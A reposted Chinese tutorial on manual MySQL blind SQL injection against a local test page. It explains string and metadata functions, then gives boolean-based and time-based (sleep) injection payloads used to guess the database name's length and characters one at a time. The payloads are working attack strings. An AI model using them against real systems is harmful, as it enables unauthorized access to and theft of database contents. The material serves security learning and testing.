首页 / MYSQL / 十几分钟让你学会MySQL布尔和延迟盲注手工操作

十几分钟让你学会MySQL布尔和延迟盲注手工操作

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了十几分钟让你学会MySQL布尔和延迟盲注手工操作,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2515字,纯文字阅读大概需要4分钟

内容图文

作者:Max老白Gān丶
链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31
来源:LOFTER

  • 注入常用到的几个函数



  •  
    1 mid(str,1,3)
    字符串获取
    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
    这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了
  •  
    1 ORD()
    转换为ASCII码
    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
    我们看到这里把a转换成了97 我们去看对照表
    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
  • 1 Length()
    统计字节长度

    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
  •  
    1 version()
    查看数据库版本 

    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
  •  
    1 database()
    查看数据库
    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
  •  
    1 user()
    查看当前用户
    十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片


首先我们确定注入了验证要先获取数据库长度

1 2 and length(database()) or length(database())


  我们先看一下数据库中sqltest长度【其实就是7个】
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
小知识点:有数据用and 没数据用or

1 http://localhost/test.php?id=1’and length(database()) >1 #

 

1 and length(database()) >1 #:

意思是数据库的长度是否大于1
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片没有变化以此类推
发现变换
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片

这时候我们要确定他到底是多少字节

 
1 http://localhost/test.php?id=1‘ and length(database()) = 8 %23


他等于8吗?不等于
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
他等于6吗?不等于
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
他等于7返回正确页面说明他的字节是7
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片

现在我们获取数据库名字:

1 http://localhost/test.php?id=1‘ and mid(database(),1,1) =‘1‘%23

 

 
1 mid(database(),1,1) =‘1‘

:它的意思是从第一个获取每次只取一个 它等于1吗?
很显然不等
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
然后修改后面的以此类推我们试到

 
1 http://localhost/test.php?id=1‘ and mid(database(),1,1) =‘s‘%23


返回true的正确页面
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
如果我们想获取第二位第三位怎么办?

 
1 2 3 4 5 6 7 mid(database(),2,1) mid(database(),3,1) mid(database(),4,1) mid(database(),5,1) mid(database(),6,1) mid(database(),7,1) http://localhost/test.php?id=1‘ and mid(database(),2,1)  =‘q‘%23


十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片剩下的我就不一一获取了学习这样方式就明白了。

延时注入方法:

常用的判断语句:

1 2 3 4 5 6 7 8 9 ‘ and if(1=0,1, sleep(10)) --+      " and if(1=0,1, sleep(10)) --+   ) and if(1=0,1, sleep(10)) --+   ) and if(1=0,1, sleep(10)) --+   ") and if(1=0,1, sleep(10)) --+



为什么我和布尔注入写在一个文章里面哪?因为他们操作的流程是差不多的。
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片


延时了10秒确定存在注入。

获取数据库长度利用上面的知识:

1 and if(length(database())=9,sleep(10),1)--+


意思是如果数据过长度等于9他就延时10秒

1 and if(length(database())<6,sleep(10),1)--+


如果一开始不知道他长度可以用这个大致判断的长度然后用上面的等于确定
长度小于6吗?没有延迟不小于6

十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
小于9吗?
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片



延迟成功表名数据库小于9 也就是说数据库长度在6-9之间

1 and if(length(database())=7,sleep(10),1)--+


一 一测试我们确定长度是7
十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片
获取数据库名字:

1 http://localhost/test.php?id=1‘ and if(mid(database(),1,1) =‘s‘,sleep(10),1)--+


十几分钟让你学会MySQL布尔和延迟盲注手工操作 - 文章图片

十几分钟让你学会MySQL布尔和延迟盲注手工操作

标签:imageview   等于   对照表   post   height   说明   nta   padding   成功   

本文系统来源:https://www.cnblogs.com/ichunqiu/p/10189661.html

内容总结

以上是互联网集市为您收集整理的十几分钟让你学会MySQL布尔和延迟盲注手工操作全部内容,希望文章能够帮你解决十几分钟让你学会MySQL布尔和延迟盲注手工操作所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接:https://qyyshop.com/info/504392.html

来源:【匿名】